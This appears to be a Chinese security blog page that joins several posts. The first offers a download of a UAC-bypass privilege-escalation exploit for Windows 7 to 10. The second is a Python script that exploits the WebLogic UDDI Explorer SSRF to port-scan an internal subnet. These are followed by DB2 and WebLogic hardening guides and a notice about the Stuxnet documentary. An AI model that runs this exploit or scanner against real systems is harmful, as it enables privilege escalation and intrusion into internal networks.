[EXP]bypassUAC/通杀UAC提权(win7/2008/win8/win8.1/win10)

工具: bypassUAC_Win7_10[K8team]
编译: VS2010 C++
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2016/9/6 20:48:24

简介:
[EXP]bypassUAC/通杀UAC提权(win7/2008/win8/win8.1/win10)
UAC提权还是区别于普通用户的提权,因为其本身就是管理员用户
但平时我所说的提权不是指UAC,只是我现在这样写博客容易搜到

打个比方
一个没权限管理部门的经理,一个没权限管理部门的员工
表面上权限没多大区别,但经理的福利好处还是比较多…

Tested on:
Win7 x86
Win2008 R2 X64
Win8.1 X64
Win10 x86

0x001 Win7
2013年以前多个bypassUAC方法中的其中一个,至今2016.9.6 Win7全补丁,依然可用
[EXP]bypassUAC通杀(win7/2008/win8/win8.1/win10) – K8拉登哥哥 – K8拉登哥哥s Blog

最新 bypassUAC_Win7_10
原文在:https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
[EXP]bypassUAC通杀(win7/2008/win8/win8.1/win10) – K8拉登哥哥 – K8拉登哥哥s Blog

0x002 2008 R2 x64
2013编译的bypassUACexe已失效,bypassUAC_Win7_10可用
[EXP]bypassUAC通杀(win7/2008/win8/win8.1/win10) – K8拉登哥哥 – K8拉登哥哥s Blog
0x003 Win8.1 x64
bypassUAC_Win7_10
[EXP]bypassUAC通杀(win7/2008/win8/win8.1/win10) – K8拉登哥哥 – K8拉登哥哥s Blog

0x004 Win10 x86
bypassUAC_Win7_10
[EXP]bypassUAC通杀(win7/2008/win8/win8.1/win10) – K8拉登哥哥 – K8拉登哥哥s Blog

下载地址:
文件: bypassUAC_Win7_10[K8team].exe
SHA1: EDED07DE082231556804BB124135CFD445D8A00C
平台: XP/Vista/Win7/Win8/2000/2003/2008/2012
猛击: https://pan.baidu.com/s/1qXHWvZQ

Weblogic SSRF Python-POC

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import ssl
import sys
import time
import thread
import requests
def scan(ip_str):
ports = (’21’,’22’,’23’,’53’,’80’,’135′,’139′,’443′,’445′,’1080′,’1433′,’1521′,’3306′,’3389′,’4899′,’8080′,’7001′,’8000′,)
for port in ports:
exp_url = “http://10.1.2.2:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search”%(ip_str,port)
try:
response = requests.get(exp_url, timeout=15, verify=False)
#SSRF判断
re_sult1 = re.findall(‘weblogic.uddi.client.structures.exception.XML_SoapException’,response.content)
#丢失连接.端口连接不上
re_sult2 = re.findall(‘but could not connect’,response.content)
if len(re_sult1)!=0 and len(re_sult2)==0:
print ip_str+’:’+port
except Exception, e:
pass
def find_ip(ip_prefix):
”’
给出当前的10.20.7 ,然后扫描整个段所有地址
”’
for i in range(15,255):
ip = ‘%s.%s’%(ip_prefix,i)
thread.start_new_thread(scan, (ip,))
time.sleep(3)
if __name__ == “__main__”:
commandargs = sys.argv[1:]
args = “”.join(commandargs)
ip_prefix = ‘.’.join(args.split(‘.’)[:-1])
find_ip(ip_prefix)

# help xx.py 127.0.0.1

DB2 常见加固

1.PUBLIC 撤销隐式的权限和特权

当一个用户创建一个数据库对象时,数据库管理器会隐式地将一些特权授给用户。

连接数据库,执行下面的命令取消 PUBLIC 的隐式的权限和特权:

REVOKE BINDADD ON DATABASE FROM PUBLIC;
REVOKE CREATETAB ON DATABASE FROM PUBLIC;
REVOKE CONNECT ON DATABASE FROM PUBLIC;
REVOKE IMPLICIT_SCHEMA ON DATABASE FROM PUBLIC;
REVOKE USE OF TABLESPACE USERSPACE1 FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.COLAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.DBAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.INDEXAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.PACKAGEAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.PASSTHRUAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.ROUTINEAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.SCHEMAAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.SECURITYLABELACCESS FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.SECURITYPOLICYEXEMPTIONS FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.SEQUENCEAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.SURROGATEAUTHIDS FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.TABAUTH FROM PUBLIC; 
REVOKE SELECT ON TABLE SYSCAT.TBSPACEAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.XSROBJECTAUTH FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.AUTHORIZATIONIDS FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.OBJECTOWNERS FROM PUBLIC;
REVOKE SELECT ON TABLE SYSCAT.PRIVILEGES FROM PUBLIC;

2. 用户权限最小化

根据实际业务需要,删除用户某些不必要的权限。连接数据库,执行类似如下命令:

# 撤销用户 test 对表 users 的 ALTER 权限:
REVOKE ALTER ON TABLE users FROM USER test;

# 撤销用户 test对表 users 的所有权限:
REVOKE ALL PRIVILEGES ON TABLE users FROM USER test;

在 Windows 下,可以通过图形化工具来进行相关设置。

 

3. 用户、口令加固

DB2 使用操作系统用户来作为自身用户,建议此处按照操作系统加固指南进行。

主要内容包括删除废弃的用户、密码复杂度设置、密码使用期限、密码重复使用限制、用户锁定策略等。

 

4. 审计设置

可执行下面的命令来检查当前审计状态:

db2audit describe

如果需要对数据库活动进行审计,可以按照下面的步骤开启审计功能:

第一步: 配置审计事件类型

# 审计 CHECKING 事件类型,只记录失败的尝试,并使用 NORMAL 错误处理
db2audit configure scope checking status failure errortype normal

第二步:配置审计缓冲区

# 设置缓冲区大小为 40,确保审计功能使用异步日志记录,避免影响服务器性能
update dbm cfg using audit_buf_sz 40

第三步:重启服务,审计生效

# 重启DB2
db2stop
db2start

# 启动审计功能
db2audit start

更多审计功能的使用方法请参阅下面的文章:

http://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0603wasserman/index.html

注:审计功能将会生成大量的日志记录,不建议长时间开启,但应建立定期审计制度,在需要的时候使用。

Continue reading “DB2 常见加固”

Weblogic 安全加固

1、以低权限用户运行weblogic

以weblogic 12c为例,执行如下命令:
# su - root
# groupadd weblogic
# useradd -g weblogic weblogic -s /bin/bash
# chown -R weblogic:weblogic /tmp/wls12120

然后重新启动服务
# su - weblogic
# /tmp/wls12120/user_projects/domains/mydomain/startWebLogic.sh

2、限制用户尝试登陆次数

选择左侧导航栏中的“安全领域”,选择右侧领域名称,再选择“用户封锁”,根据自身需求设置参数:

设置完成后无需重启,测试效果如图:

3、更改控制台目录名

更改高级选项中的“控制台上下文路径”为一个特异的名字,以达到隐蔽的效果,修改后需重启生效。

当然,也可以直接取消掉“启用控制台”,这样就完全不能使用console了。

 

4. 删除内置应用

停止Weblogic应用,根据需要删除下列位置的对应名称的文件或目录,然后重启服务:

WAR 包:
%WEBLOGIC_HOME%/wlserver/server/lib/*.war
%WEBLOGIC_HOME%/***domain/servers/***server/tmp/.internal/*.war
工作目录:
%WEBLOGIC_HOME%/***domain/servers/***server/tmp/_WL_internal/*
注意:**domain 是在安装weblogic时由运维人员定义的名称,需根据实际情况确定
例如,要删除 uddiexplorer 解决 UDDI Explorer SSRF 漏洞(CVE-2014-4241)需要删除下列文件/目录:
%WEBLOGIC_HOME%/wlserver/server/lib/uddiexplorer.war
%WEBLOGIC_HOME%/***domain/servers/***server/tmp/.internal/uddiexplorer.war
%WEBLOGIC_HOME%/***domain/servers/***server/tmp/_WL_internal/uddiexplorer(目录)

震网病毒纪录片《零日.Zero Days.2016》HD1080P E安全独家中文字幕

震网病毒纪录片《零日.Zero Days.2016》简介

《零日》主要讲述了“震网”计算机蠕虫病毒攻击伊朗核设施的故事:为阻止伊朗核计划,美国等国不仅采取暗杀伊朗核专家等手段,还利用“震网”病毒攻击伊朗核设施,导致浓缩铀离心机转速失控……

2010年,国际信息技术专家首次发现可自我复制的“震网”病毒。据报道,该病毒为美国和以色列为破坏伊朗核计划共同研发,有关计划代号为“奥运会”。“震网”病毒不仅攻击了伊朗核设施,还一度失控,蔓延至全球多国。

影片中,知情者透露,“奥运会”计划实际上只是美国“NITRO ZEUS”网络战行动的一部分,该行动可通过攻击工业、交通、防空、电网等关键设施,令伊朗瞬间瘫痪,且不留下任何证据。

迄今为止,美国政府从未承认对别国实施网络攻击,并一再指责其他国家对美国发动网络攻击。导演吉布尼当天在柏林电影节记者会上表示,国际社会已就核生化武器达成有关协议,却对网络武器讳莫如深。网络武器危险异常,希望通过公开讨论,避免网络战可能带来的严重后果。

震网病毒纪录片《零日.Zero Days.2016》1080P完整版下载地址

http://pan.baidu.com/s/1jI4RvWa

http://pan.baidu.com/share/init?shareid=860835386&uk=604004991

密码请在E安全微信号公众号(EAQapp)内回复“零日2016”获取